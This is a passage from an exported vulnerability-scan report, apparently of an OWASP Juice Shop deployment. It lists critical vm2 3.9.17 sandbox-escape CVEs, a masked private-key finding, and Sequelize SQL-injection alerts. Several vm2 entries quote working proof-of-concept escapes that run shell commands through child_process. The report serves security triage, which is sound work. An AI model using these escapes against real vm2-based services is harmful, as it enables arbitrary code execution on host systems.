+https://github.com/openssl/openssl/commit/ce39170276daec87f55c39dad1f629b56344429e
+https://github.com/openssl/openssl/commit/d0071a0799f20cc8101730145349ed4487c268dc
+https://linux.oracle.com/cve/CVE-2025-15467.html
+https://linux.oracle.com/errata/ELSA-2026-50081.html
+https://nvd.nist.gov/vuln/detail/CVE-2025-15467
+https://openssl-library.org/news/secadv/20260127.txt
+https://ubuntu.com/security/notices/USN-7980-1
+https://www.cve.org/CVERecord?id=CVE-2025-15467

+ + + + + + + +
+
+
+
+ Finding 228: CVE-2026-43997 Vm2 3.9.17 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporter
+ + + Critical + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin)
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
vm23.9.17
+ + + + + + + +
File Path
juice-shop/node_modules/vm2/package.json
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

+ + +
Description
+

vm2 Access to Host Object Enables Sandbox Escape
+Target: Node.js
+Type: node-pkg
+Fixed version: 3.11.0

+

Summary

+

It is possible to obtain the host Object, +https://github.com/patriksimek/vm2/commit/ +ebcfe94ad2f864f0bc35e78cff1d921107cfd160 added some protections, but the + implementation is incomplete.

+

Details

+

There are various ways to use the host Object, to escape the sandbox, one example would be using HostObject.getOwnPropertySymbols to obtain Symbol(nodejs.util.inspect.custom)

+

PoC

+
const g = {}.__lookupGetter__;
+const a = Buffer.apply;
+const p = a.apply(g, [Buffer, ['__proto__']]);
+const o = p.call(p.call(a));
+const HObject = o.constructor;
+sym = HObject.getOwnPropertySymbols(Buffer.prototype).at(0);
+
+const obj = {
+    [sym]: (depth, opt, inspect) => {
+        inspect.constructor("return process.getBuiltinModule('child_process').execSync('ls',{stdio:'inherit'})")();
+    },
+    valueOf: undefined,
+    constructor: undefined,
+};
+
+WebAssembly.compileStreaming(obj).catch(() => {});
+
+ +

Impact

+

Sandbox Escape -> RCE

+ + +
Mitigation
+

3.11.0

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://github.com/patriksimek/vm2
+https://github.com/patriksimek/vm2/releases/tag/v3.11.0
+https://github.com/patriksimek/vm2/security/advisories/GHSA-47x8-96vw-5wg6

+ + + + + + + +
+
+
+
+ Finding 227: CVE-2026-26332 Vm2 3.9.17 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + Critical + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 94 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
vm23.9.17
+ + + + + + + +
File Path
juice-shop/node_modules/vm2/package.json
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

+ + +
Description
+

VM2 Has a Sandbox Escape Issue via SuppressedError
+Target: Node.js
+Type: node-pkg
+Fixed version: 3.11.0

+

vm2 is an open source vm/sandbox for Node.js. Prior to version +3.11.0, SuppressedError allows attackers to escape the sandbox and run +arbitrary code. This issue has been patched in version 3.11.0.

+ + +
Mitigation
+

3.11.0

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://github.com/patriksimek/vm2
+https://github.com/patriksimek/vm2/commit/119fd0aa1e4c27b08cf37946b2dafa99e2c754f0
+https://github.com/patriksimek/vm2/commit/4cb82cc94d9bb6c9a918b45f8c6790c32a5e913f
+https://github.com/patriksimek/vm2/commit/7395c3a4b01d302e55271c87dbeb44d6b83b81ca
+https://github.com/patriksimek/vm2/commit/792e16d56ee429ab19e284ed9c545f5e4694fb7d
+https://github.com/patriksimek/vm2/commit/d715dd88c5aec5bbb4dce03ddf7c3eb3791d0338
+https://github.com/patriksimek/vm2/releases/tag/v3.11.0
+https://github.com/patriksimek/vm2/security/advisories/GHSA-55hx-c926-fr95
+https://nvd.nist.gov/vuln/detail/CVE-2026-26332

+ + + + + + + +
+
+
+
+ Finding 226: CVE-2026-24781 Vm2 3.9.17 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + Critical + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 94 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
vm23.9.17
+ + + + + + + +
File Path
juice-shop/node_modules/vm2/package.json
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

+ + +
Description
+

vm2: vm2: Arbitrary code execution via sandbox breakout through inspect function
+Target: Node.js
+Type: node-pkg
+Fixed version: 3.11.0

+

vm2 is an open source vm/sandbox for Node.js. Prior to version +3.11.0, VM2 suffers from a sandbox breakout vulnerability through the +inspect function. This allows attackers to write code which can escape +from the VM2 sandbox and execute arbitrary commands on the host system. +This issue has been patched in version 3.11.0.

+ + +
Mitigation
+

3.11.0

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/security/cve/CVE-2026-24781
+https://github.com/patriksimek/vm2
+https://github.com/patriksimek/vm2/commit/8d30d93213c1898b3e035298b89a814970dd1189
+https://github.com/patriksimek/vm2/commit/bdd3d15e57bc4ec5e70365cd79f7cb0256e5f88c
+https://github.com/patriksimek/vm2/commit/fd266d084e0a3322d0f71ba2a8dc4c96cd030228
+https://github.com/patriksimek/vm2/releases/tag/v3.11.0
+https://github.com/patriksimek/vm2/security/advisories/GHSA-v37h-5mfm-c47c
+https://nvd.nist.gov/vuln/detail/CVE-2026-24781
+https://www.cve.org/CVERecord?id=CVE-2026-24781

+ + + + + + + +
+
+
+
+ Finding 233: CVE-2026-44009 Vm2 3.9.17 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporter
+ + + Critical + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin)
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
vm23.9.17
+ + + + + + + +
File Path
juice-shop/node_modules/vm2/package.json
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

+ + +
Description
+

vm2 has Sandbox Breakout Through Null Proto Exception
+Target: Node.js
+Type: node-pkg
+Fixed version: 3.11.2

+

Summary

+

VM2 suffers from a sandbox breakout vulnerability. This allows +attackers to write code which can escape from the VM2 sandbox and +execute arbitrary commands on the host system.

+

Details

+

In handleException due to // SECURITY (post-GHSA-mpf8 hardening): use `from` (not `ensureThis`) + exceptions with a null proto will be assumed to come from the other +side and being proxied. Therefore, it is possible to get the proxied and + unproxied object of a sandbox object with a null proto when thrown and +then catched which allows to get the host Function object.

+

PoC

+
const {VM} = require("vm2");
+const vm = new VM();
+console.log(vm.run(`
+const o = {__proto__: null};
+try {
+    throw o;
+} catch (e) {
+    e.f = Buffer.prototype.inspect
+    o.f.constructor("return process")().mainModule.require('child_process').execSync('touch pwned');
+}
+`));
+
+ +

Impact

+

Attackers can perform Remote Code Execution under the assumption that + arbitrary code can be executed inside the context of a vm2 sandbox.

+ + +
Mitigation
+

3.11.2

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://github.com/patriksimek/vm2
+https://github.com/patriksimek/vm2/releases/tag/v3.11.2
+https://github.com/patriksimek/vm2/security/advisories/GHSA-9vg3-4rfj-wgcm

+ + + + + + + +
+
+
+
+ Finding 225: CVE-2026-24120 Vm2 3.9.17 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + Critical + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 94 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
vm23.9.17
+ + + + + + + +
File Path
juice-shop/node_modules/vm2/package.json
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

+ + +
Description
+

VM2 Has Sandbox Breakout Through Promise Species
+Target: Node.js
+Type: node-pkg
+Fixed version: 3.10.5

+

vm2 is an open source vm/sandbox for Node.js. Prior to version +3.10.5, the fix for CVE-2023-37466 is insufficient and can be +circumvented allowing attackers to write code which can escape from the +VM2 sandbox and execute arbitrary commands on the host system. This +issue has been patched in version 3.10.5.

+ + +
Mitigation
+

3.10.5

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://github.com/patriksimek/vm2
+https://github.com/patriksimek/vm2/releases/tag/v3.10.5
+https://github.com/patriksimek/vm2/security/advisories/GHSA-cchq-frgv-rjh5
+https://github.com/patriksimek/vm2/security/advisories/GHSA-qvjj-29qf-hp7p
+https://nvd.nist.gov/vuln/detail/CVE-2026-24120

+ + + + + + + +
+
+
+
+ Finding 224: CVE-2026-24118 Vm2 3.9.17 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + Critical + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 94 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
vm23.9.17
+ + + + + + + +
File Path
juice-shop/node_modules/vm2/package.json
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

+ + +
Description
+

VM2 Sandbox Breakout Through lookupGetter
+Target: Node.js
+Type: node-pkg
+Fixed version: 3.11.0

+

vm2 is an open source vm/sandbox for Node.js. Prior to version +3.11.0, VM2 suffers from a sandbox breakout vulnerability. This allows +attackers to write code which can escape from the VM2 sandbox and +execute arbitrary commands on the host system. This issue has been +patched in version 3.11.0.

+ + +
Mitigation
+

3.11.0

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://github.com/patriksimek/vm2
+https://github.com/patriksimek/vm2/commit/2b5f3e3a060d9088f5e1cdd585d683d491f990a3
+https://github.com/patriksimek/vm2/commit/f9b700b1c7d9ef2df416666cb24e0b659140cc74
+https://github.com/patriksimek/vm2/releases/tag/v3.11.0
+https://github.com/patriksimek/vm2/security/advisories/GHSA-grj5-jjm8-h35p
+https://nvd.nist.gov/vuln/detail/CVE-2026-24118

+ + + + + + + +
+
+
+
+ Finding 223: CVE-2026-22709 Vm2 3.9.17 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + Critical + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 94 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
vm23.9.17
+ + + + + + + +
File Path
juice-shop/node_modules/vm2/package.json
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

+ + +
Description
+

vm2 has a Sandbox Escape
+Target: Node.js
+Type: node-pkg
+Fixed version: 3.10.2

+

vm2 is an open source vm/sandbox for Node.js. In vm2 prior to version 3.10.2, Promise.prototype.then Promise.prototype.catch + callback sanitization can be bypassed. This allows attackers to escape +the sandbox and run arbitrary code. In lib/setup-sandbox.js, the +callback function of localPromise.prototype.then is sanitized, but globalPromise.prototype.then is not sanitized. The return value of async functions is globalPromise object. Version 3.10.2 fixes the issue.

+ + +
Mitigation
+

3.10.2

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://github.com/patriksimek/vm2
+https://github.com/patriksimek/vm2/commit/4b009c2d4b1131c01810c1205e641d614c322a29
+https://github.com/patriksimek/vm2/releases/tag/v3.10.2
+https://github.com/patriksimek/vm2/security/advisories/GHSA-99p7-6v5w-7xg8
+https://nvd.nist.gov/vuln/detail/CVE-2026-22709

+ + + + + + + +
+
+
+
+ Finding 232: CVE-2026-44008 Vm2 3.9.17 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporter
+ + + Critical + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin)
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
vm23.9.17
+ + + + + + + +
File Path
juice-shop/node_modules/vm2/package.json
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

+ + +
Description
+

vm2 has sandbox breakout via neutralizeArraySpeciesBatch
+Target: Node.js
+Type: node-pkg
+Fixed version: 3.11.2

+

Summary

+

VM2 suffers from a sandbox breakout vulnerability. This allows +attackers to write code which can escape from the VM2 sandbox and +execute arbitrary commands on the host system.

+

Details

+

The new method neutralizeArraySpeciesBatch works with +objects from the other side but can call into this side via getter on +the array prototype exposing objects of the wrong side into the sandbox. + This can be used to get host objects and get the host Function object.

+

PoC

+
const {VM} = require("vm2");
+const vm = new VM();
+console.log(vm.run(`
+const a = [];
+Object.defineProperty(Array.prototype, 0, {
+    set(value) {
+        a.f = Buffer.prototype.inspect;
+        value.arr.f.constructor.constructor("return process")().mainModule.require('child_process').execSync('touch pwned');
+    }
+});
+new Buffer(a);
+`));
+
+ +

Impact

+

Attackers can perform Remote Code Execution under the assumption that + arbitrary code can be executed inside the context of a vm2 sandbox.

+ + +
Mitigation
+

3.11.2

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://github.com/patriksimek/vm2
+https://github.com/patriksimek/vm2/releases/tag/v3.11.2
+https://github.com/patriksimek/vm2/security/advisories/GHSA-9qj6-qjgg-37qq

+ + + + + + + +
+
+
+
+ Finding 231: CVE-2026-44007 Vm2 3.9.17 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporter
+ + + Critical + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin)
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
vm23.9.17
+ + + + + + + +
File Path
juice-shop/node_modules/vm2/package.json
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H

+ + +
Description
+

vm2 NodeVM nesting: true bypasses require: false allowing sandbox escape and arbitrary OS command execution
+Target: Node.js
+Type: node-pkg
+Fixed version: 3.11.1

+

Summary

+

When a NodeVM is created with nesting: true, sandbox code can unconditionally require('vm2') regardless of the outer VM's require configuration — including require: false. With access to vm2, the sandbox constructs a new inner NodeVM with its own unrestricted require settings and executes arbitrary OS commands on the host. Any application that runs untrusted code inside a NodeVM with nesting: true is fully compromised.

+

Details

+

The vulnerability is in how the nesting: true option interacts with the legacy module resolver.

+

lib/nodevm.js:96-99NESTING_OVERRIDE is a special builtin map that injects the vm2 package into the sandbox:

+
const NESTING_OVERRIDE = Object.freeze({
+  __proto__: null,
+  vm2: vm2NestingLoader
+});
+
+ +

lib/nodevm.js:268-269 — When nesting: true, this override is passed into the resolver factory alongside the host's require options:

+
const customResolver = requireOpts instanceof Resolver;
+const resolver = customResolver ? requireOpts : makeResolverFromLegacyOptions(
+  requireOpts,
+  nesting && NESTING_OVERRIDE,  // ← injected when nesting:true
+  this._compiler
+);
+
+ +

lib/resolver-compat.js:193-197 — This is the vulnerable branch. When require: false is set, requireOpts is falsy, so !options is true. Without nesting the function returns DENY_RESOLVER (block everything). With nesting, it instead builds a resolver that includes vm2 from NESTING_OVERRIDE:

+
function makeResolverFromLegacyOptions(options, override, compiler) {
+  if (!options) {
+    if (!override) return DENY_RESOLVER;  // require:false, no nesting → deny all
+    // BUG: require:false + nesting:true reaches here
+    // override (NESTING_OVERRIDE) is applied, making vm2 available
+    const builtins = makeBuiltinsFromLegacyOptions(undefined, defaultRequire, undefined, override);
+    return new Resolver(DEFAULT_FS, [], builtins);  // vm2 is now requireable
+  }
+  // ...
+}
+
+ +

lib/builtin.js:102-106NESTING_OVERRIDE is merged unconditionally into builtins, overriding any user-configured allowlist:

+
if (overrides) {
+  const keys = Object.getOwnPropertyNames(overrides);
+  for (const key of keys) {
+    res.set(key, overrides[key]);  // vm2 always injected when nesting:true
+  }
+}
+
+ +

The result: require('vm2') always succeeds inside a NodeVM with nesting: true, regardless of require: false, require: { builtin: [] }, or any other restriction. Once the sandbox has vm2, it creates a new inner NodeVM with whatever require config it chooses — unconstrained by the outer VM — and reaches child_process.

+

This was introduced in commit 2353ce60 (Feb 8, 2022) and survived a major refactor in commit 9e2b6051 (Apr 8, 2023). The JSDoc for nesting does warn that "scripts can create a NodeVM which can require any host module," but does not document that nesting: true silently defeats require: false, which is the non-obvious part of this interaction.

+

PoC

+

Requirements: vm2 installed, Node.js v22.22.1 (also reproduced on earlier versions).

+
const { NodeVM } = require('vm2');
+
+// Host intends: nesting enabled, but require completely disabled
+const vm = new NodeVM({ nesting: true, require: false });
+
+const result = vm.run(`
+  // Step 1: require('vm2') succeeds despite require:false on the outer VM
+  const { NodeVM: NVM } = require('vm2');
+
+  // Step 2: create an inner NodeVM with attacker-chosen require config
+  // This inner VM has no relation to the outer VM's restrictions
+  const inner = new NVM({ require: { builtin: ['child_process'] } });
+
+  // Step 3: execute arbitrary OS command in the inner VM
+  module.exports = inner.run(
+    'module.exports = require("child_process").execSync("id").toString()'
+  );
+`);
+
+console.log(result);
+// uid=1000(akshat) gid=1000(akshat) groups=1000(akshat),4(adm),...
+
+ +

Observed output (confirmed on Node v22.22.1, vm2 commit 8dd0591):

+
uid=1000(akshat) gid=1000(akshat) groups=1000(akshat),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),100(users),104(kvm),118(lpadmin),989(docker),990(ollama),991(nordvpn)
+
+ +

The variant with require: false also works — the outer VM's require setting has no effect:

+
new NodeVM({ nesting: true, require: false }).run(`
+  const { NodeVM: NVM } = require('vm2');
+  module.exports = new NVM({ require: { builtin: ['child_process'] } })
+    .run('module.exports = require("child_process").execSync("id").toString()');
+`);
+// uid=1000(akshat) ...
+
+ +

Narrow builtin allowlists are also bypassed. require: { builtin: ['path'] } still allows require('vm2') when nesting is enabled.

+

Impact

+

Who is affected: Any application that runs untrusted or user-supplied code inside a NodeVM with nesting: true. + This includes multi-tenant code execution platforms, notebook/REPL +services, plugin systems, and CI sandboxing tools that use vm2.

+

What an attacker can do: Execute arbitrary OS +commands as the host process user. From there: read/write files, +exfiltrate secrets from the environment, move laterally on the host +network, or establish persistence.

+

Severity: The mental model mismatch is the core danger. A developer who sets require: false to lock down modules, then adds nesting: true to allow child VM creation, will believe the sandbox is restricted. It is not — require: false is silently overridden and the sandbox has unrestricted OS access.

+

Note: nesting: true must be set by the host. This is not a zero-cooperation escape from a default NodeVM. However, it is not pure misconfiguration either: the implementation defeats a strong and reasonable expectation (require: false should mean deny all), and the existing warning in the docs does not surface the require: false bypass specifically.

+ + +
Mitigation
+

3.11.1

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://github.com/patriksimek/vm2
+https://github.com/patriksimek/vm2/releases/tag/v3.11.1
+https://github.com/patriksimek/vm2/security/advisories/GHSA-8hg8-63c5-gwmx

+ + + + + + + +
+
+
+
+ Finding 222: CVE-2023-37903 Vm2 3.9.17 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + Critical + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 78 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
vm23.9.17
+ + + + + + + +
File Path
juice-shop/node_modules/vm2/package.json
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

+ + +
Description
+

vm2: custom inspect function allows attackers to escape the sandbox and run arbitrary code
+Target: Node.js
+Type: node-pkg
+Fixed version:

+

vm2 is an open source vm/sandbox for Node.js. In vm2 for versions up +to and including 3.9.19, Node.js custom inspect function allows +attackers to escape the sandbox and run arbitrary code. This may result +in Remote Code Execution, assuming the attacker has arbitrary code +execution primitive inside the context of vm2 sandbox. There are no +patches and no known workarounds. Users are advised to find an +alternative software.

+ + + + + + +
Impact
+

affected

+ + + + + + + +
References
+

https://access.redhat.com/security/cve/CVE-2023-37903
+https://github.com/patriksimek/vm2
+https://github.com/patriksimek/vm2/security/advisories/GHSA-g644-9gfx-q4q4
+https://nvd.nist.gov/vuln/detail/CVE-2023-37903
+https://security.netapp.com/advisory/ntap-20230831-0007
+https://security.netapp.com/advisory/ntap-20230831-0007/
+https://security.netapp.com/advisory/ntap-20241108-0002
+https://security.netapp.com/advisory/ntap-20241108-0002/
+https://www.cve.org/CVERecord?id=CVE-2023-37903

+ + + + + + + +
+
+
+
+ Finding 221: CVE-2023-37466 Vm2 3.9.17 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + Critical + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 94 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
vm23.9.17
+ + + + + + + +
File Path
juice-shop/node_modules/vm2/package.json
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

+ + +
Description
+

vm2: Promise handler sanitization can be bypassed allowing attackers to escape the sandbox and run arbitrary code
+Target: Node.js
+Type: node-pkg
+Fixed version: 3.10.0

+

vm2 is an advanced vm/sandbox for Node.js. The library contains +critical security issues and should not be used for production. The +maintenance of the project has been discontinued. In vm2 for versions up + to 3.9.19, Promise handler sanitization can be bypassed with the @@species + accessor property allowing attackers to escape the sandbox and run +arbitrary code, potentially allowing remote code execution inside the +context of vm2 sandbox. Version 3.10.0 contains a patch for the issue.

+ + +
Mitigation
+

3.10.0

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/security/cve/CVE-2023-37466
+https://gist.github.com/leesh3288/f693061e6523c97274ad5298eb2c74e9
+https://github.com/patriksimek/vm2
+https://github.com/patriksimek/vm2/commit/d9a1fde8ec5a5a9c9e5a69bf91d703950859d744
+https://github.com/patriksimek/vm2/releases/tag/v3.10.0
+https://github.com/patriksimek/vm2/security/advisories/GHSA-cchq-frgv-rjh5
+https://nvd.nist.gov/vuln/detail/CVE-2023-37466
+https://security.netapp.com/advisory/ntap-20230831-0007
+https://security.netapp.com/advisory/ntap-20241108-0002
+https://security.netapp.com/advisory/ntap-20241108-0002/
+https://www.cve.org/CVERecord?id=CVE-2023-37466

+ + + + + + + +
+
+
+
+ Finding 220: CVE-2023-32314 Vm2 3.9.17 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + Critical + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 74 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
vm23.9.17
+ + + + + + + +
File Path
juice-shop/node_modules/vm2/package.json
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

+ + +
Description
+

vm2: Sandbox Escape
+Target: Node.js
+Type: node-pkg
+Fixed version: 3.9.18

+

vm2 is a sandbox that can run untrusted code with Node's built-in +modules. A sandbox escape vulnerability exists in vm2 for versions up to + and including 3.9.17. It abuses an unexpected creation of a host object + based on the specification of Proxy. As a result a threat +actor can bypass the sandbox protections to gain remote code execution +rights on the host running the sandbox. This vulnerability was patched +in the release of version 3.9.18 of vm2. Users are advised to upgrade. There are no known workarounds for this vulnerability.

+ + +
Mitigation
+

3.9.18

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/security/cve/CVE-2023-32314
+https://gist.github.com/arkark/e9f5cf5782dec8321095be3e52acf5ac
+https://github.com/patriksimek/vm2
+https://github.com/patriksimek/vm2/commit/d88105f99752305c5b8a77b63ddee3ec86912daf
+https://github.com/patriksimek/vm2/releases/tag/3.9.18
+https://github.com/patriksimek/vm2/security/advisories/GHSA-whpj-8f3w-67p5
+https://nvd.nist.gov/vuln/detail/CVE-2023-32314
+https://www.cve.org/CVERecord?id=CVE-2023-32314

+ + + + + + + +

High

+ +
+
+
+
+ Finding 245: Secret Detected in /juice-shop/lib/insecurity.ts - Asymmetric Private Key + + + + secret + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporter
+ + + High + + + + N.A. + / + N.A. + ActiveMay 12, 20260 daysAdmin User (admin)
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + +
Line Number
23
+ + + + + + + +
File Path
/juice-shop/lib/insecurity.ts
+
+
+
+ + + + + +
Description
+

Asymmetric Private Key
+Category: AsymmetricPrivateKey
+Match: ----BEGIN RSA PRIVATE KEY-----**********************************************************************************************************************-----END RSA PRIVATE

+ + + + + + + + + + + + + + + + + + +
+
+
+
+ Finding 2: +javascript.sequelize.security.audit.sequelize-injection-express.express- +sequelize-injection + + + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + High + + + + N.A. + / + N.A. + ActiveMay 12, 20260 daysAdmin User (admin) + + 89 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + +
Line Number
5
+ + + + + + + +
File Path
/src/data/static/codefixes/dbSchemaChallenge_1.ts
+
+
+
+ + + + + +
Description
+

Result message: + Detected a sequelize statement that is tainted by user-input. This +could lead to SQL injection if the variable is user-controlled and is +not properly sanitized. In order to prevent SQL injection, it is +recommended to use parameterized queries or prepared statements.

+ + + + + + + + + + + + +
References
+

https://sequelize.org/docs/v6/core-concepts/raw-queries/#replacements

+ + + + + + + +
+
+
+
+ Finding 3: +javascript.sequelize.security.audit.sequelize-injection-express.express- +sequelize-injection + + + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + High + + + + N.A. + / + N.A. + ActiveMay 12, 20260 daysAdmin User (admin) + + 89 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + +
Line Number
11
+ + + + + + + +
File Path
/src/data/static/codefixes/dbSchemaChallenge_3.ts
+
+
+
+ + + + + +
Description
+

Result message: + Detected a sequelize statement that is tainted by user-input. This +could lead to SQL injection if the variable is user-controlled and is +not properly sanitized. In order to prevent SQL injection, it is +recommended to use parameterized queries or prepared statements.

+ + + + + + + + + + + + +
References
+

https://sequelize.org/docs/v6/core-concepts/raw-queries/#replacements

+ + + + + + + +
+
+
+
+ Finding 4: +javascript.sequelize.security.audit.sequelize-injection-express.express- +sequelize-injection + + + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + High + + + + N.A. + / + N.A. + ActiveMay 12, 20260 daysAdmin User (admin) + + 89 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + +
Line Number
6
+ + + + + + + +
File Path
/src/data/static/codefixes/unionSqlInjectionChallenge_1.ts
+
+
+
+ + + + + +
Description
+

Result message: + Detected a sequelize statement that is tainted by user-input. This +could lead to SQL injection if the variable is user-controlled and is +not properly sanitized. In order to prevent SQL injection, it is +recommended to use parameterized queries or prepared statements.

+ + + + + + + + + + + + +
References
+

https://sequelize.org/docs/v6/core-concepts/raw-queries/#replacements

+ + + + + + + +
+
+
+
+ Finding 5: +javascript.sequelize.security.audit.sequelize-injection-express.express- +sequelize-injection + + + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
